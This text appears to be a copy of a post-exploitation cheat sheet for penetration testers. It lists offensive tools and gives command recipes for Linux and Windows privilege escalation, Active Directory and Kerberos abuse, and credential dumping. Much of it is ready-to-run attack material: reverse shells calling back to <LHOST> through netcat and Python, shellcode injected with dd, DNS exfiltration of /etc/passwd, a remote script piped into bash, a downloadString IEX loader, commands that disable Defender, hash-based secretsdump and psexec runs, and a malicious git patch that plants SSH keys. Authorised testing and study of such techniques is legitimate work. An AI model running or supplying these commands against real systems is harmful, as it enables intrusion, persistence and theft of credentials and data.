Post Exploitation

Reference : https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md

Post Exploitation

• Resources

Table of Contents

• accesschk

• ADCSTemplate

• Apache2

• AppLocker

• APT

• Bash

• Bash Debugging Mode

• BloodHound

• BloodHound Python

• Certify

• Certipy

• ClamAV

• Credentials File

• dd

• DNS

• enum4linux

• enum4linux-ng

• Evil-WinRM

• gdbus

• gem

• Git

• gMSADumper

• grep

• gsocket

• find

• functions

• Impacket

• Internet Information Service (IIS)

• JAWS

• Kerberos

• Krbrelayx

• LAPS

• LDAP

• ldapsearch

• LD_PRELOAD

• LD_LIBRARY_PATH

• Linux

• Linux Wildcards

• logrotten

• Lsass

• Lua

• machinectl

• Microsoft Windows

• Microsoft Windows Defender

• Minimalistic Offensive Security Tools

• PassTheCert

• Path Variable Hijacking

• pika

• Ping Sweep

• PKINITtools

• plotting

• Port Scanning

• PoshADCS

• powercat

• Powermad

• PowerShell Constrained Language Mode (CLM)

• PowerSploit

• PowerView

• PRET

• procdump

• pspy

• pth-toolkit

• pwncat

• Python

• rpcclient

• Rubeus

• RunasCs

• SeBackupPrivilege Privilege Escalation (diskshadow)

• setcap

• SharpHound

• Shell Upgrade

• Sherlock

• systemctl

• Time Stomping

• Universal Privilege Escalation and Persistence Printer

• User Group Exploitation

• VSS

• WDigest

• Whisker

• Windows-Exploit-Suggester

• winexe

• writeDACL

Resources

Name	Description	URL
ADCSKiller - An ADCS Exploitation Automation Tool	An ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer	https://github.com/grimlockx/ADCSKiller
ADCSTemplate	A PowerShell module for exporting, importing, removing, permissioning, publishing Active Directory Certificate Templates. It also includes a DSC resource for creating AD CS templates using these functions. This was built with the intent of using DSC for rapid lab builds. Could also work in production to move templates between AD CS environments.	https://github.com/GoateePFE/ADCSTemplate
adPEAS	Powershell tool to automate Active Directory enumeration.	https://github.com/61106960/adPEAS
BloodHound	BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.	https://github.com/BloodHoundAD/BloodHound
BloodHound	Fork of BloodHound with PKI nodes and edges for Certipy along with some minor personal improvements	https://github.com/ly4k/BloodHound
BloodHound Docker	BloodHound Docker Ready to Use	https://github.com/belane/docker-bloodhound
BloodHound Python	BloodHound.py is a Python based ingestor for BloodHound, based on Impacket.	https://github.com/fox-it/BloodHound.py
BloodyAD Framework	BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py.	https://github.com/CravateRouge/bloodyAD
Certify	Active Directory certificate abuse.	https://github.com/GhostPack/Certify
Certipy	Tool for Active Directory Certificate Services enumeration and abuse	https://github.com/ly4k/Certipy
check_vulnerabledrivers.ps1	A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io	https://gist.github.com/api0cradle/d52832e36aaf86d443b3b9f58d20c01d
Coercer	A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.	https://github.com/p0dalirius/Coercer
CSExec (a C Sharp psexec implementation)	An implementation of PSExec in C#	https://github.com/malcomvetter/CSExec
DLLSideloader	PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading	https://github.com/Flangvik/DLLSideloader
dnsteal	This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.	https://github.com/m57/dnsteal
enum4linux	A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.	https://github.com/CiscoCXSecurity/enum4linux
enum4linux-ng	A next generation version of enum4linux.	https://github.com/cddmp/enum4linux-ng
EvilTree	A python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches.	https://github.com/t3l3machus/eviltree
GhostPack-Compiled Binaries	Compiled Binaries for Ghostpack (.NET v4.0)	https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
GTFOBins	GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.	https://gtfobins.github.io/
HEKATOMB	Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them.	https://github.com/Processus-Thief/HEKATOMB
Impacket	Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.	https://github.com/fortra/impacket
Impacket Static Binaries	Standalone binaries for Linux/Windows of Impacket's examples	https://github.com/ropnop/impacket_static_binaries
JAWS	JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems.	https://github.com/411Hall/JAWS
KrbRelay	Framework for Kerberos relaying	https://github.com/cube0x0/KrbRelay
KrbRelayUp	KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).	https://github.com/Dec0ne/KrbRelayUp
Krbrelayx	Kerberos unconstrained delegation abuse toolkit	https://github.com/dirkjanm/krbrelayx
LAPSDumper	Dumping LAPS from Python	https://github.com/n00py/LAPSDumper
LinEnum	Privilege Escalation Enumeration	https://github.com/rebootuser/LinEnum
linWinPwn	linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks	https://github.com/lefayjey/linWinPwn
LOLAPPS	LOLAPPS is a compendium of applications that can be used to carry out day-to-day exploitation.	https://lolapps-project.github.io/#
LOLBAS	The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.	https://lolbas-project.github.io/#
LOLDrivers	Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.	https://www.loldrivers.io
LOOBins	Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes.	https://www.loobins.io
lsassy	Python tool to remotely extract credentials on a set of hosts.	https://github.com/Hackndo/lsassy
nanodump	LSASS dumper	https://github.com/helpsystems/nanodump
NTLMRelay2Self	An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).	https://github.com/med0x2e/NTLMRelay2Self
Obfuscated SharpCollection	Attempt at Obfuscated version of SharpCollection	https://github.com/Flangvik/ObfuscatedSharpCollection
PassTheCert	Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through Schannel	https://github.com/AlmondOffSec/PassTheCert
PEASS-ng	Privilege Escalation Awesome Scripts SUITE new generation	https://github.com/carlospolop/PEASS-ng
Ping Castle	Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework.	https://github.com/vletoux/pingcastle
PKINITtools	Tools for Kerberos PKINIT and relaying to AD CS	https://github.com/dirkjanm/PKINITtools
powercat	Netcat: The powershell version.	https://github.com/besimorhino/powercat
Powermad	PowerShell MachineAccountQuota and DNS exploit tools	https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
PowerSharpPack	Many useful offensive CSharp Projects wraped into Powershell for easy usage.	https://github.com/S3cur3Th1sSh1t/PowerSharpPack
PowershellKerberos	Some scripts to abuse kerberos using Powershell	https://github.com/MzHmO/PowershellKerberos
PowerShell-Suite	My musings with PowerShell	https://github.com/FuzzySecurity/PowerShell-Suite
PowerSploit	PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.	https://github.com/PowerShellMafia/PowerSploit
PowerUp	PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.	https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
PowerView	PowerView is a PowerShell tool to gain network situational awareness on Windows domains.	https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PowerView.py	PowerView alternative	https://github.com/aniqfakhrul/powerview.py
PPLdump	Dump the memory of a PPL with a userland exploit	https://github.com/itm4n/PPLdump
Priv2Admin	Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.	https://github.com/gtworek/Priv2Admin
PSPKIAudit	PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.	https://github.com/GhostPack/PSPKIAudit
pspy	pspy is a command line tool designed to snoop on processes without need for root permissions.	https://github.com/DominicBreuker/pspy
pth-toolkit	A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems.	https://github.com/byt3bl33d3r/pth-toolkit
pwncat	Post-Exploitation Platform	https://github.com/calebstewart/pwncat
PyWhisker	Python version of the C# tool for "Shadow Credentials" attacks	https://github.com/ShutdownRepo/pywhisker
Rubeus	Rubeus is a C# toolset for raw Kerberos interaction and abuses.	https://github.com/GhostPack/Rubeus
RunasCs	RunasCs - Csharp and open version of windows builtin runas.exe	https://github.com/antonioCoco/RunasCs
RustHound	Active Directory data collector for BloodHound written in rust.	https://github.com/OPENCYBER-FR/RustHound
scavenger	scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information.	https://github.com/SpiderLabs/scavenger
SCShell	Fileless lateral movement tool that relies on ChangeServiceConfigA to run command	https://github.com/Mr-Un1k0d3r/SCShell
Seatbelt	Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.	https://github.com/GhostPack/Seatbelt
SeBackupPrivilege	Use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn't have access to.	https://github.com/giuliano108/SeBackupPrivilege
SharpCollection	Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.	https://github.com/Flangvik/SharpCollection
SharpEventPersist	Persistence by writing/reading shellcode from Event Log	https://github.com/improsec/SharpEventPersist
SharpExfiltrate	Modular C# framework to exfiltrate loot over secure and trusted channels.	https://github.com/Flangvik/SharpExfiltrate
SharpHound	C# Data Collector for BloodHound	https://github.com/BloodHoundAD/SharpHound
SharpStay	.NET project for installing Persistence	https://github.com/0xthirteen/SharpStay
Sharp-Suite	Also known by Microsoft as Knifecoat hot_pepper	https://github.com/FuzzySecurity/Sharp-Suite
SharpView	C# implementation of harmj0y's PowerView	https://github.com/tevora-threat/SharpView
Sherlock	PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.	https://github.com/rasta-mouse/Sherlock
SMBeagle	SMBeagle - Fileshare auditing tool.	https://github.com/punk-security/smbeagle
static-binaries	This repo contains a bunch of statically-linked binaries of various tools, along with the Dockerfiles / other build scripts that can be used to build them.	https://github.com/andrew-d/static-binaries
SUDO_KILLER	A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation.	https://github.com/TH3xACE/SUDO_KILLER
tickey	Tool to extract Kerberos tickets from Linux kernel keys.	https://github.com/TarlogicSecurity/tickey
Villain	Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.	https://github.com/t3l3machus/Villain
WADComs	WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.	https://wadcoms.github.io
Watson	Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.	https://github.com/rasta-mouse/Watson
WESNG	WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.	https://github.com/bitsadmin/wesng
Whisker	Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.	https://github.com/eladshamir/Whisker
Windows-privesc-check	Tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).	https://github.com/pentestmonkey/windows-privesc-check
Windows Privilege Escalation Fundamentals	How-to Windows Privilege Escalation	https://www.fuzzysecurity.com/tutorials/16.html
Windows Privilege Escalation	Windows privlege escalation methodology	https://github.com/frizb/Windows-Privilege-Escalation
WinPwn	Automation for internal Windows Penetrationtest / AD-Security	https://github.com/S3cur3Th1sSh1t/WinPwn
wmiexec-Pro	New generation of wmiexec.py	https://github.com/XiaoliChan/wmiexec-Pro

accesschk

Checking File Permissions

C:\> .\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe"

Checking Service Permissions

C:\> .\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc

Checking Path Permissions to find Unquoted Service Paths

C:\> .\accesschk.exe /accepteula -uwdq C:\
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\"
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>"

Checking Registry Entries

C:\> .\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY>

Apache2

Read first Line of a File with apache2 Binary

$ sudo /usr/sbin/apache2 -f <FILE>

AppLocker

https://github.com/api0cradle/UltimateAppLockerByPassList

Bypass List (Windows 10 Build 1803)

C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

APT

$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE>

Bash

SUID Privilege Escalation

$ cp /bin/bash .
$ chmod +s bash
$ bash -p

White Collar eval Arbitrary Code Execution

https://www.vidarholen.net/contents/blog/?p=716

Example

#!/bin/bash
chmod +s /bin/bash

'a[$(/tmp/<FILE>.sh>&2)]+42' /tmp/<FILE>.sh

Bash Debugging Mode

• Bash <4.4

$ env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY>

BloodHound

https://github.com/BloodHoundAD/BloodHound

Installation

$ pip install bloodhound
$ sudo apt-get install neo4j
$ sudo apt-get install bloodhound

Installing and starting Database

$ wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
$ sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
$ sudo apt-get update
$ sudo apt-get install apt-transport-https
$ sudo apt-get install neo4j
$ systemctl start neo4j

$ sudo neo4j start console
$ sudo bloodhound --no-sandbox

http://localhost:7474/browser/

Alternatively

$ sudo npm install -g electron-packager
$ git clone https://github.com/BloodHoundAD/Bloodhound
$ cd BloodHound
$ npm install
$ npm run linuxbuild
$ cd BloodHound-linux-x64
$ sudo ./BloodHound --no-sandbox

Database Password Reset

http://localhost:7474/browser/

ALTER USER neo4j SET PASSWORD '<PASSWORD>'

Custom Queries

https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md

Custom Query Location on macOS

/System/Volumes/Data/Users/<USERNAME>/Library/Application Support/bloodhound/

BloodHound Python

Build Docker Container

$ docker build -t bloodhound.py

Collection Method All

$ bloodhound-python -u <USERNAME> -p "<PASSWORD>" -d <DOMAIN> -gc <DOMAIN> -c all -ns <RHOST>
$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN> -dc <RHOST> -ns <RHOST> --dns-tcp -no-pass -c ALL --zip

LDAP Dumping

$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -ns <RHOST> -d <DOMAIN> -c All

Parsing

$ cat 20220629013701_users.json | jq | grep \"name\"

Certify

https://github.com/GhostPack/Certify

PS C:\> Certify find /vulnerable
PS C:\> Certify.exe find /vulnerable /currentuser

Certipy

https://github.com/ly4k/Certipy

https://github.com/ly4k/BloodHound/

Common Commands

$ certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>

Certificate Handling

Account Creation

$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>

Authentication

$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>

LDAP-Shell

$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell

# add_user <USERNAME>
# add_user_to_group <GROUP>

Certificate Forging

$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old

Certificate Request

Run the following command twice because of a current issue with certipy.

$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>

$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN> -debug

Start BloodHound Fork

$ ./BloodHound --disable-gpu-sandbox

ClamAV

File Replacement Privilege Escalation

• Vulnerable Version 1.0.0

$ clamscan --version
ClamAV 1.0.0/26853/Fri Mar 24 07:24:11 2023

Example

Create a custom authorized_keys file to replace another one. Then create a custom database with the hex value of the string you want to parse for.

$ printf ssh | xxd -p

custom_malware.db

Malware=737368

Execution

$ clamscan --remove=yes /root/.ssh/authorized_keys -d custom_malware.db
$ clamscan authorized_keys --copy=/root/.ssh/ -d custom_malware.db

Credentials File

https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ&s=09

https://www.nirsoft.net/utils/credentials_file_view.html

C:\ rundll32 keymgr.dll, KRShowKeyMgr

dd

Execute Shellcode

$ dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc

DNS

Data Exfiltration

Extract /etc/passwd

$ perl -E 'qx^Cdig $_.$$.${\(rand)}.example.com^Cfor(unpack"H*",qx^?cat /etc/pas*^?)=~m^H(..)^Hgc'

^C, ^H, and ^? are the corresponding single ASCII values.

enum4linux

https://github.com/CiscoCXSecurity/enum4linux

$ enum4linux -a <RHOST>

enum4linux-ng

https://github.com/cddmp/enum4linux-ng

$ enum4linux-ng -A <RHOST>

Excel

.csv Files Command Injection

If the file get's parsed on a Linux operationg system, commands can be injected to the rows.

$ echo '" --exec="\!/dev/shm/<FILE>"' >> /PATH/TO/FILE/<FILE>.csv

Evil-WinRM

https://github.com/Hackplayers/evil-winrm

$ evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>

*Evil-WinRM* PS C:\> menu

Using Certificate and Private Key

$ evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S

Deactivate Windows Defender

$ Set-MpPreference -DisableRealtimeMonitoring $true

PowerView.ps1

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

$ evil-winrm -i compatibility -u '<USERNAME>' -p '<PASSWORD>' -s .

*Evil-WinRM* PS C:\> menu
*Evil-WinRM* PS C:\> Bypass-4MSI
*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
*Evil-WinRM* PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
*Evil-WinRM* PS C:\> Add-DomainGroupMember -Identity 'Domain Admins' -Members '<USERNAME>' -Credential $cred

Check User

*Evil-WinRM* PS C:\> Get-DomainUser <USERNAME> -Credential $cred

Code Execution

*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { whoami; hostname }

Find a File

*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { gci -recurse C:\Users <FILE>.txt }

Read a File

*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { cat \path\to\file\<FILE>.txt }

Remove a User from a Group

*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { net group "Domain Admins" <USERNAME> /del }

find

Specific Size

$ find / -size 50M    // find files with a size of 50MB

Modified Files

$ find / -mtime 10    // find modified files in the last 10 days
$ find / -atime 10    // find accessed files in the last 10 days
$ find / -cmin -60    // find files changed within the last 60 minutes
$ find / -amin -60    // find files accesses within the last 60 minutes

Passwords

$ find ./ -type f -exec grep --color=always -i -I 'password' {} \;

Group Permissions

$ find / -group <group> 2>/dev/null

User specific Files

$ find / -user <USERNAME> 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null
$ find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null

SUID and SGID Files

$ find / -perm -4000 2>/dev/null
$ find / -perm -4000 2>/dev/null | xargs ls -la
$ find / -type f -user root -perm -4000 2>/dev/null
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

functions

• Bash <4.2-048

$ function /usr/sbin/<BINARY> { /bin/bash -p; }
$ export -f /usr/sbin/<BINARY>
$ /usr/sbin/<BINARY>

gdbus

Privilege Escalation

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true

gem

$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc

Git

Git apply (Malicious Patch) Privilege Escalation

Payload

diff --git a/x b/../../../home/<USERNAME>/.ssh/authorized_keys
new file mode 100400
index 0000000..a3d61a0
--- /dev/null
+++ b/../../../home/<USERNAME>/.ssh/authorized_keys
@@ -0,0 +1 @@
+<SSH_PUBLIC_KEY>

Execution

$ git apply patch --unsafe-paths

Git Attributes Privilege Escalation

https://git-scm.com/book/en/v2/Customizing-Git-Git-Attributes#filters_b

Notice that I only found this within a CTF so far. The pre-requisites are git commit get's executed via script.

Payload

export RHOST="<LHOST>";export RPORT=<LPORT>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Execution

$ git init
$ echo '*.c filter=indent' > .git/info/attributes
$ git config filter.indent.clean /tmp/<FILE>
$ sudo -u <USERNAME> git-commit.sh

gMSADumper

https://github.com/micahvandeusen/gMSADumper

$ python3 gMSADumper.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -l dc.<DOMAIN>

grep

$ grep -R db_passwd
$ grep -roiE "password.{20}"
$ grep -oiE "password.{20}" /etc/*.conf
$ grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$"    // grep for passwords like "DBPassword:"

gsocket

Shell

$ bash -c "$(curl -fsSL gsocket.io/x)"

Impacket

https://github.com/fortra/impacket

$ impacket-smbserver local . -smb2support
$ impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
$ impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
$ impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
$ impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
$ impacket-getST <DOMAIN>/<USERNAME>$ -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
$ impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'

impacket-smbclient

$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass

impacket-getTGT

$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
$ impacket-getTGT <DOMAIN>/<USERNAME> -dc-ip <DOMAIN> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c

impacket-GetNPUsers

$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
$ impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes

impacket-getUserSPNs / GetUserSPNs.py

$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request

impacket-secretsdump

$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST>
$ impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug
$ impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
$ impacket-secretsdump -dc-ip <RHOST> <DOMAIN>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

impacket-psexec

$ impacket-psexec <USERNAME>@<RHOST>
$ impacket-psexec <DOMAIN>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18

impacket-ticketer

Requirements

• Valid User

• NTHASH

• Domain-SID

$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <DOMAIN> -spn MSSQLSVC/<RHOST>.<DOMAIN> -user-id 500 Administrator

Fixing [-] exceptions must derive from BaseException

Issue

$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<DOMAIN> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] exceptions must derive from BaseException

To fix it

241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost

dacledit.py

https://github.com/fortra/impacket/blob/204c5b6b73f4d44bce0243a8f345f00e308c9c20/examples/dacledit.py

$ python3 dacledit.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' -dc-ip <RHOST> -action read -principal '<USERNAME>' -target '<GROUP>' -debug

Fixing msada_guids Error

#from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS

Then put the msada_guids.py into the same directory as dacledit.py

https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py

owneredit.py

https://github.com/fortra/impacket/blob/5c477e71a60e3cc434ebc0fcc374d6d108f58f41/examples/owneredit.py

$ python3 owneredit.py -k '<DOMAIN>/<USERNAME>:<PASSWORD>' -dc-ip <RHOST> -action write -new-owner '<USERNAME>' -target '<GROUP>' -debug

Internet Information Service (IIS)

Application Pool Credential Dumping

C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*

JAWS

https://github.com/411Hall/JAWS

PS C:\> IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')

Kerberos

Authentication

https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/kerberos-authentication

If a user wants to obtain access to resources within a Active Directory network, he must obtain a ticket through a 6-step process.

1. User sends a request to the Kerberos Distribution Center (KDC) with his password hash and a timestamp. (AS-REQ)

2. If the password hash of the user matches that for the user on the KDC, the user receives a Ticket Granting Ticket encrypted and signed by the krbtgt account. (AS-REP)

3. The TGT, including the krbtgt hash, is sent to the KDC or DC in order to recieve a Kerberos Service Ticket (TGS). (TGS-REQ)

4. User then receives a TGS encrypted with the hash of the service account he wishes to access. (TGS-REP)

5. User then connects to the server and attempts to use the service he sent the initial request for with the TGS included. (AP-REQ)

6. User gains access and mutual authentication is given between the server and client if necessary (AP-REP).

Constrained Delegation

https://csforza.gitbook.io/pentesting-articles-and-notes/windows/active-directory/privilege-escalation/constrained-delegation

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation

• Constrained Delegation limits the services to which a service can access on behalf of a user.

• This service account must still be trusted to delegate.

